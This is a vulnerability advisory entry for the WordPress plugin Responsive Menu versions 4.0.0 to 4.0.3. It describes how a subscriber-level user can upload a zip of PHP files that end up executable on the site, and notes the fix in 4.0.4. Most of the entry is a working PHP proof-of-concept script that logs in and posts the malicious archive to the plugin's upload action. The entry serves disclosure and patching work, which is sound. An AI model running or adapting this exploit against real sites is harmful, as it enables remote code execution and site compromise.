WordPress Plugin Vulnerabilities
Responsive Menu 4.0.0 - 4.0.3 - Authenticated Arbitrary File Upload
Description
"A subscriber could upload zip archives containing malicious PHP files that would get extracted to the /rmp-menu/themes/ directory. These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow an attacker to execute commands to further infect a WordPress site."
Proof of Concept
<?php
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
$upfile = $argv[4];
// 1) Log in as customer
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'log' => $wp_user,
'pwd' => $wp_pass,
'rememberme' => 'forever',
'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);
// Update Settings
$ch = curl_init();
$cFile = curl_file_create( realpath( $upfile ) );
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-post.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'action' => 'rmp_upload_theme_file',
'file' => $cFile,
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?> Affects Plugins
Fixed in version 4.0.4
Fixed in version 4.0.4
References
Classification
Type
UPLOAD
CWE
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
No
Timeline
Publicly Published
2021-02-10 (about 1 years ago)
Added
2021-02-10 (about 1 years ago)
Last Updated
2021-04-07 (about 1 years ago)